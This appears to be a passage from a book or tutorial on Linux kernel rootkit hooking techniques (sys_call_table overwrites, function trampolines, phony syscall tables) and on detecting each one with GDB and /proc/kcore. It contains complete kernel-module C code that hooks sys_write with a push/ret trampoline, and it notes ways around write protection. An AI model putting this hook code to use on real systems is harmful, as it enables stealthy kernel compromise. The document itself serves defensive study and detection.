Traditional kernel rootkits, such as adore and phalanx, worked by overwriting pointers in sys_call_table so that they would point to a replacement function, which would then call the original syscall as needed. This was accomplished by either an LKM or a program that modified the kernel through /dev/kmem or /dev/mem. On today's Linux systems, for security reasons, these writable windows into memory are disabled or are no longer capable of anything but read operations depending on how the kernel is configured. There have been other ways of trying to prevent this type of infection, such as marking sys_call_table as const so that it is stored in the .rodata section of the text segment. This can be bypassed by marking the corresponding
PTE (short for Page Table Entry) as writeable, or by disabling the write-protect bit in the cr0 register. Therefore, this type of infection is a very reliable way to make a rootkit even today, but it is also very easily detected.
To detect sys_call_table modifications, you may look at the System.map file or /proc/kallsyms to see what the memory address of each system call should be. For instance, if we want to detect whether or not the sys_write system call has been infected, we need to learn the legitimate address of sys_write and its index within the sys_call_table, and then validate that the correct address is actually stored there in memory using GDB and /proc/kcore.
$ sudo grep sys_write /proc/kallsyms
ffffffff811d5310 T sys_write
$ grep _write /usr/include/x86_64-linux-gnu/asm/unistd_64.h
#define __NR_write 1
$ sudo gdb -q vmlinux /proc/kcore
(gdb) x/gx &sys_call_table+1
0xffffffff81801464 <sys_call_table+4>: 0x811d5310ffffffffRemember that numbers are stored in little endian on x86 architecture. The value at sys_call_table[1] is equivalent to the correct sys_write address as looked up in /proc/kallsyms. We have therefore successfully verified that the sys_call_table entry for sys_write has not been tampered with.
This technique was originally introduced by Silvio Cesare in 1998. The idea was to be able to modify syscalls without having to touch sys_call_table, but the truth is that this technique allows any function in the kernel to be hooked. Therefore, it is very powerful. Since 1998, a lot has changed; the kernels text segments can no longer be modified without disabling the write-protect bit in cr0 or modifying a PTE. The main issue, however, is that most modern kernels use SMP, and kernel function trampolines are unsafe because they use non-atomic operations such as memcpy() every time the patched function is called. As it turns out, there are methods for circumventing this problem as well, using a technique that I will not discuss here. The real point is that kernel function trampolines are actually still being used, and therefore understanding them is still quite important.
It is considered a safer technique to patch the individual call instructions that invoke the original function so that they invoke the replacement function instead. This method can be used as an alternative to function trampolines, but it may be arduous to find every single call, and this often changes from kernel to kernel. Therefore, this method is not as portable.
Imagine you want to hijack syscall SYS_write and do not want to worry about modifying sys_call_table directly since it is easily detectable. This can be accomplished by overwriting the first 7 bytes of the sys_write code with a stub that contains code for jumping to another function.
#define SYSCALL_NR __NR_write
static char syscall_code[7];
static char new_syscall_code[7] =
"\x68\x00\x00\x00\x00\xc3"; // push $addr; ret
// our new version of sys_write
int new_syscall(long fd, void *buf, size_t len)
{
printk(KERN_INFO "I am the evil sys_write!\n");
// Replace the original code back into the first 6
// bytes of sys_write (remove trampoline)
memcpy(
sys_call_table[SYSCALL_NR], syscall_code,
sizeof(syscall_code)
);
// now we invoke the original system call with no trampoline
((int (*)(fd, buf, len))sys_call_table[SYSCALL_NR])(fd, buf, len);
// Copy the trampoline back in place!
memcpy(
sys_call_table[SYSCALL_NR], new_syscall_code,
sizeof(syscall_code)
);
}
int init_module(void)
{
// patch trampoline code with address of new sys_write
*(long *)&new_syscall_code[1] = (long)new_syscall;
// insert trampoline code into sys_write
memcpy(
syscall_code, sys_call_table[SYSCALL_NR],
sizeof(syscall_code)
);
memcpy(
sys_call_table[SYSCALL_NR], new_syscall_code,
sizeof(syscall_code)
);
return 0;
}
void cleanup_module(void)
{
// remove infection (trampoline)
memcpy(
sys_call_table[SYSCALL_NR], syscall_code,
sizeof(syscall_code)
);
}This code example replaces the first 6 bytes of sys_write with a push; ret stub, which pushes the address of the new sys_write function onto the stack and returns to it. The new sys_write function can then do any sneaky stuff it wants to, although in this example we only print a message to the kernel log buffer. After it has done the sneaky stuff, it must remove the trampoline code so that it can call untampered sys_write, and finally it puts the trampoline code back in place.
Typically, function trampolines will overwrite part of the procedure prologue (the first 5 to 7 bytes) of the function that they are hooking. So, to detect function trampolines within any kernel function or syscall, you should inspect the first 5 to 7 bytes and look for code that jumps or returns to another address. Code like this can come in a variety of forms. Here are a few examples.
Push the target address onto the stack and return to it. This takes up 6 bytes of machine code when a 32-bit target address is used:
push $address ret
Move the target address into a register for an indirect jump. This takes 7 bytes of code when a 32-bit target address is used:
movl $addr, %eax jmp *%eax
Calculate the offset and perform a relative jump. This takes 5 bytes of code when a 32-bit offset is used:
jmp offset
If, for instance, we want to validate whether or not the sys_write syscall has been hooked with a function trampoline, we can simply examine its code to see whether the procedure prologue is still in place:
$ sudo grep sys_write /proc/kallsyms 0xffffffff811d5310 $ sudo gdb -q vmlinux /proc/kcore Reading symbols from vmlinux... [New process 1] Core was generated by `BOOT_IMAGE=/vmlinuz-3.16.0-49-generic root=/dev/mapper/ubuntu--vg-root ro quiet'. #0 0x0000000000000000 in ?? () (gdb) x/3i 0xffffffff811d5310 0xffffffff811d5310 <sys_write>: data32 data32 data32 xchg %ax,%ax 0xffffffff811d5315 <sys_write+5>: push %rbp 0xffffffff811d5316 <sys_write+6>: mov %rsp,%rbp
The first 5 bytes are actually serving as NOP instructions for alignment (or possibly space for ftrace probes). The kernel uses certain sequences of bytes (0x66, 0x66, 0x66, 0x66, and 0x90). The procedure prologue code follows the initial 5 NOP bytes, and is perfectly intact. Therefore, this validates that sys_write syscall has not been hooked with any function trampolines.
One classic way of infecting the kernel is by inserting a phony system call table into the kernel memory and modifying the top-half interrupt handler that is responsible for invoking syscalls. In an x86 architecture, the interrupt 0x80 is deprecated and has been replaced with a special syscall/sysenter instruction for invoking system calls. Both syscall/sysenter and int 0x80 end up invoking the same function, named system_call(), which in-turn calls the selected syscall within sys_call_table:
(gdb) x/i system_call_fastpath+19
0xffffffff8176ea86 <system_call_fastpath+19>:
callq *-0x7e7feba0(,%rax,8)
On x86_64, the preceding call instruction takes place after a swapgs in system_call(). Here is what the code looks like in entry.S:
call *sys_call_table(,%rax,8)
The (r/e)ax register contains the syscall number that is multiplied by sizeof(long) to get the index into the correct syscall pointer. It is easily conceivable that an attacker can kmalloc() a phony system call table into the memory (which contains some modifications with pointers to malicious functions), and then patch the call instruction so that the phony system call table is used. This technique is actually quite stealthy because it yields no modifications to the original sys_call_table. Unfortunately for intruders, however, this technique is still very easy to detect for the trained eye.
To detect whether the system_call() routine has been patched with a call to a phony sys_call_table or not, simply disassemble the code with GDB and /proc/kcore, and then find out whether or not the call offset points to the address of sys_call_table. The correct sys_call_table address can be found in System.map or /proc/kallsyms.